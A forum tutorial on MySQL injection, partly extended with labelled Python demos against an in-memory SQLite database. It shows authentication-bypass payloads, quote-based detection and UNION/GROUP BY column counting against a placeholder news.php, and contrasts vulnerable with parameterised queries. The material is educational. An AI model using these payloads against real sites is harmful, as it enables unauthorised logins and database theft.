Assalam-o-Alaikum,
Today we are going to learn about MySQL injection, a complete tutorial. Well, I say complete; I don't say this tutorial is entirely my own, but I do say it is written up by me :p
It was originally written by attack.
*************************************786**************************************
I have made it a series so that I could present it properly:
- Lesson 1 and 2: Intro and types of vulnerabilities
- Lesson 3: Learning about MySQL
- Lesson 4: Expert learning about MySQL
If you do not yet know what SQL injection is, this article is probably not for you, so let's skip the basics. In short: SQL injection is an attack in which the attacker alters the query that the application sends to the database, in order to read information from the database or to change it.
To follow this article you need:
a) A brain :p
b) Steady hands
c) Knowledge of the SQL language
This article is written mainly for PHP + MySQL, but there are a few MSSQL examples.
In fact the best way to learn SQL injection is not to read this article at all but to try it live: write (or install) a vulnerable script yourself and work through the scenarios described here on your own machine.
Each section builds on the previous one, so I recommend reading all of it in order.
Unfortunately the article had to be split into several posts because of the 20,000-character limit.
Finding an injection is still fairly easy. We take every field, variable and cookie and drop a single quote into it.
1.1 The first case
Take the script:
http://xxx/news.php?id=1
Suppose the original query to the database is:
Code:
SELECT * FROM news WHERE id='1';
Now append a quote to the variable, in this case to "id":
http://xxx/news.php?id=1'
If the variable is not filtered, an error message like this will appear:
mysql_query(): You have an error in SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
because the query that went to the database is now:
Code:
SELECT * FROM news WHERE id='1'';
If error reporting is turned off, that does not confuse us either: it does not stop us from confirming that the injection is there (the same method is described in paragraph 1.4):
http://xxx/news.php?id=1'; --
(with a space after the "--"; in a URL write it as %20 or +). The query to the database is now:
Code:
SELECT * FROM news WHERE id='1'; -- ';
(For those who missed it: "--" marks the start of a comment, and everything after it is discarded. I would like to draw your attention to the fact that in MySQL the "--" must be followed by a space, as the documentation says, so the payload always ends in "-- " with a trailing space.) Thus for MySQL the query is the same as before, and the page looks exactly as it does for
http://xxx/news.php?id=1
Now let's look at a different script, whose query is:
Code:
SELECT * FROM users WHERE login LIKE 'admin' AND pass LIKE '123';
This script is vulnerable even if quotes are already filtered. We simply enter "%" instead of the password (with the LIKE operator the "%" symbol matches any string), and the query becomes:
Code:
SELECT * FROM users WHERE login LIKE 'admin' AND pass LIKE '%';
and we are logged in as 'admin'. Strictly speaking we have not found an injection here at all, yet we have still broken the authentication.
What if the script checks the login with a plain comparison instead? IMHO it would be foolish to use an injection in a script like this merely to pull information out of the database; it is an authentication check, so use it to log in. Let the query be:
Code:
SELECT * FROM users WHERE login='admin' AND pass='123';
Unfortunately the password '123' does not fit, but we have found that the login parameter is injectable and that a user with the login 'admin' exists. So instead of the login we write something like admin'; -- which cuts the password part out of the authentication query, and we walk in under the nickname 'admin':
Code:
SELECT * FROM users WHERE login='admin'; -- ' AND pass='123';
Now what if the vulnerability is in the 'pass' parameter? We enter 123' OR login='admin'; -- in that field. The query will be:
Code:
SELECT * FROM users WHERE login='admin' AND pass='123' OR login='admin'; -- ';
For the database this query is completely identical to:
Code:
SELECT * FROM users WHERE (login='admin' AND pass='123') OR (login='admin');
because AND binds more tightly than OR. After these steps we are logged in as 'admin' with full access.
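The two login queries above, as an added example that is not part of the original article. Python with an in-memory SQLite database stands in for PHP + MySQL, because what is being attacked is the string concatenation in the application, not the database engine; the users table, its rows (including an invented role column) and the function names are constructed here. The semicolon from the payloads above is dropped: `' -- ` on its own is enough to discard the rest of the WHERE clause, and neither PHP's mysql_query() nor sqlite3's execute() accepts a second statement anyway. The last function shows the hardened version, which the article itself does not cover, so the same payloads can be seen failing against it.

```python
import sqlite3

# Added example, not from the original article. The "users" table and its two
# rows are constructed here; SQLite stands in for MySQL.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (login TEXT, pass TEXT, role TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [("admin", "s3cret", "administrator"), ("bob", "123", "user")])
conn.commit()


def escape_quotes(value):
    """The kind of quote 'filter' the article mentions: after this a single
    quote can no longer end the string literal (PHP code would use
    mysql_real_escape_string; SQLite writes an escaped quote as '')."""
    return value.replace("'", "''")


def login_like(login, password):
    """Vulnerable form 1: the query is built with LIKE. Quotes ARE escaped,
    yet '%' is a LIKE wildcard, so pass LIKE '%' matches every stored password."""
    sql = (f"SELECT login, role FROM users WHERE login LIKE "
           f"'{escape_quotes(login)}' AND pass LIKE '{escape_quotes(password)}'")
    return conn.execute(sql).fetchone()


def login_eq(login, password):
    """Vulnerable form 2: '=' comparison with no filtering at all. A quote
    closes the literal and '-- ' comments out the rest of the WHERE clause."""
    sql = (f"SELECT login, role FROM users WHERE login = '{login}' "
           f"AND pass = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(login, password):
    """Fixed form: placeholders. The driver sends login and password as data,
    so a quote, '%' or '-- ' inside them has no SQL meaning."""
    sql = "SELECT login, role FROM users WHERE login = ? AND pass = ?"
    return conn.execute(sql, (login, password)).fetchone()


if __name__ == "__main__":
    print("LIKE, password '%':", login_like("admin", "%"))
    print("=, login \"admin' -- \":", login_eq("admin' -- ", "whatever"))
    print("=, password \"123' OR login='admin' -- \":",
          login_eq("admin", "123' OR login='admin' -- "))
    print("placeholders, same payloads:", login_safe("admin", "%"),
          login_safe("admin' -- ", "whatever"),
          login_safe("admin", "123' OR login='admin' -- "))
```

Note that escaping quotes does nothing for the LIKE case: the fix there is to compare with = through a placeholder, not to filter more characters.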
Back to the news script. Remember that in SQL numeric parameters need not be put in quotes, so for
http://xxx/news.php?id=1
the query to the database may look like this:
Code:
SELECT * FROM news WHERE id=1;
Substituting a quote into the 'id' parameter gives the same kind of error message here too, so do not skip past this injection when detecting it:
mysql_query(): You have an error in SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
If that message does not jump out at us, the quote may simply be filtered; then enter
http://xxx/news.php?id=1 bla-bla-bla
The database does not understand "bla-bla-bla" and shows an error message such as:
mysql_query(): You have an error in SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'bla-bla-bla' at line 1
If error reporting is turned off, check it with
http://xxx/news.php?id=1; --
which should look exactly like
http://xxx/news.php?id=1
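Both detection recipes, the quoted id from paragraph 1.1 and the unquoted numeric id just above, as an added example that is not part of the original article. SQLite in memory stands in for MySQL, the news table and its row are constructed, and the handler names are mine. The same probes are also run against a placeholder query, which is what makes the test meaningful: a parameterised query never produces the "comment-terminated value behaves like the plain value" signal, so that comparison is the one to rely on when error display is off. The ';' from the article's payloads is omitted; '-- ' alone neutralises the trailing quote.

```python
import sqlite3

# Added example, not from the original article. The "news" table and its one
# row are constructed here; SQLite stands in for MySQL.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
conn.execute("INSERT INTO news VALUES (1, 'first post', 'hello')")
conn.commit()


def news_quoted(id_param):
    """news.php, paragraph 1.1 style: the parameter is concatenated inside quotes."""
    return conn.execute(f"SELECT * FROM news WHERE id = '{id_param}'").fetchall()


def news_numeric(id_param):
    """news.php, numeric style: the parameter is concatenated without quotes."""
    return conn.execute(f"SELECT * FROM news WHERE id = {id_param}").fetchall()


def news_safe(id_param):
    """Fixed version: a placeholder, so the parameter is only ever data."""
    return conn.execute("SELECT * FROM news WHERE id = ?", (id_param,)).fetchall()


def probe(handler, value):
    """What the attacker sees for one request: ('ok', rows) or ('error', msg).
    SQLite raises OperationalError where mysql_query() reports error 1064."""
    try:
        return ("ok", handler(value))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def detect(handler, baseline, breaker, neutralised):
    """The two signals from the text, returned as (error_seen, comment_neutralises).
    error_seen: the 'broken' value (stray quote or junk token) produces an SQL
    error; this needs error display to be on. comment_neutralises: the value
    that ends in a comment returns exactly what the plain value returns; this
    works with error display off, and a placeholder query never shows it."""
    base = probe(handler, baseline)
    error_seen = probe(handler, breaker)[0] == "error"
    comment_neutralises = base[0] == "ok" and probe(handler, neutralised) == base
    return error_seen, comment_neutralises


if __name__ == "__main__":
    print("quoted id:  ", detect(news_quoted, "1", "1'", "1' -- "))
    print("numeric id: ", detect(news_numeric, "1", "1 bla-bla-bla", "1 -- "))
    print("placeholder:", detect(news_safe, "1", "1'", "1' -- "))
```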
Now for the more difficult part. Below we take the vulnerability described in paragraph 1.1 and look at what can actually be done with it; the same applies to the other type.
Let's start with the most useful thing: the UNION command (anyone who doesn't know it can look it up on Google).
Modify the request to:
http://xxx/news.php?id=1' UNION SELECT 1 --
The query to the database is now:
Code:
SELECT * FROM news WHERE id='1' UNION SELECT 1 -- ';
Unless the news table happens to have exactly one column, the number of columns before and after the UNION does not match, and we get this specific error:
mysql_query(): The used SELECT statements have a different number of columns
So we need to find the number of columns (so that it is the same before and after the UNION). Do it like this:
http://xxx/news.php?id=1' UNION SELECT 1,2 --
Error: "The used SELECT statements have a different number of columns"
http://xxx/news.php?id=1' UNION SELECT 1,2,3 --
Error again
...
http://xxx/news.php?id=1' UNION SELECT 1,2,3,4,5,6 --
Aha! The page displays correctly, just like http://xxx/news.php?id=1
So the query selects 6 fields.
There is a faster method of finding the number of fields, based on GROUP BY. Make a request of this type:
http://xxx/news.php?id=1' GROUP BY 2 --
No error is shown, so the number of fields is greater than or equal to 2.
Make the request:
http://xxx/news.php?id=1' GROUP BY 10 --
Oops... there is an error:
mysql_query(): Unknown column '10' in 'group statement'
So the number of columns is less than 10. Halve the interval between 2 and 10 and request
http://xxx/news.php?id=1' GROUP BY 5 --
No error, so the number of columns is greater than or equal to 5, but still less than 10. The midpoint between 5 and 10 is 7, so make the request:
http://xxx/news.php?id=1' GROUP BY 7 --
Another error...
mysql_query(): Unknown column '7' in 'group statement'
So the number of columns is less than 7 but greater than or equal to 5. Next request:
http://xxx/news.php?id=1' GROUP BY 6 --
No errors... 6 is accepted and 7 is not, so the number of columns is exactly 6, the number we needed.
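Both ways of counting columns, the UNION count-up and the GROUP BY binary search, as an added example that is not part of the original article; each method also reports how many requests it needed. The six-column news table is constructed here and SQLite stands in for MySQL: the error texts differ ("SELECTs to the left and right of UNION do not have the same number of result columns" and "GROUP BY term out of range" instead of MySQL's 1222 and 1054 messages), but the accept/reject behaviour the search relies on is the same. The GROUP BY search starts from the article's guess of 10 and widens the upper bound on its own if the table turns out to be wider than that.

```python
import sqlite3

# Added example, not from the original article. A six-column "news" table is
# constructed here so that the two methods have something to count; SQLite
# stands in for MySQL.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, "
             "author TEXT, created TEXT, views INTEGER)")
conn.execute("INSERT INTO news VALUES (1, 'first post', 'hello', 'ed', "
             "'2011-01-01', 7)")
conn.commit()

REQUESTS = {"count": 0}   # how many requests the current method has sent


def news_quoted(id_param):
    """news.php from paragraph 1.1: id is concatenated inside quotes."""
    return conn.execute(f"SELECT * FROM news WHERE id = '{id_param}'").fetchall()


def errors(payload):
    """One request; True if the server answered with an SQL error."""
    REQUESTS["count"] += 1
    try:
        news_quoted(payload)
        return False
    except sqlite3.OperationalError:
        return True


def columns_by_union(limit=50):
    """Method 1: add one more number to UNION SELECT until the 'different
    number of columns' error goes away. Returns (columns, requests)."""
    REQUESTS["count"] = 0
    for n in range(1, limit + 1):
        numbers = ",".join(str(i) for i in range(1, n + 1))
        if not errors(f"1' UNION SELECT {numbers} -- "):
            return n, REQUESTS["count"]
    return None, REQUESTS["count"]


def columns_by_group_by(hi=10):
    """Method 2: GROUP BY n is accepted exactly when n <= number of columns,
    so binary-search the boundary. Invariant: GROUP BY lo is accepted and
    GROUP BY hi errors. Returns (columns, requests)."""
    REQUESTS["count"] = 0
    lo = 1
    if errors(f"1' GROUP BY {lo} -- "):       # not even one column: wrong query shape
        return None, REQUESTS["count"]
    while not errors(f"1' GROUP BY {hi} -- "):   # first guess too small: widen it
        hi *= 2
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if errors(f"1' GROUP BY {mid} -- "):
            hi = mid
        else:
            lo = mid
    return lo, REQUESTS["count"]


def union_row(columns):
    """Once the count is known, the injected row really comes back with the data."""
    numbers = ",".join(str(i) for i in range(1, columns + 1))
    return news_quoted(f"1' UNION SELECT {numbers} -- ")


if __name__ == "__main__":
    print("UNION count-up:   ", columns_by_union())
    print("GROUP BY search:  ", columns_by_group_by())
    print("rows with UNION 6:", union_row(6))
```

With six columns the two methods cost about the same number of requests; the GROUP BY search grows with log2 of the column count, so the saving shows on wide tables.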
That's enough for this article; the rest will be in the next one.
Regards,
Zulqurnain jutt
Having confusion? Oh dear, ask me in the comments!!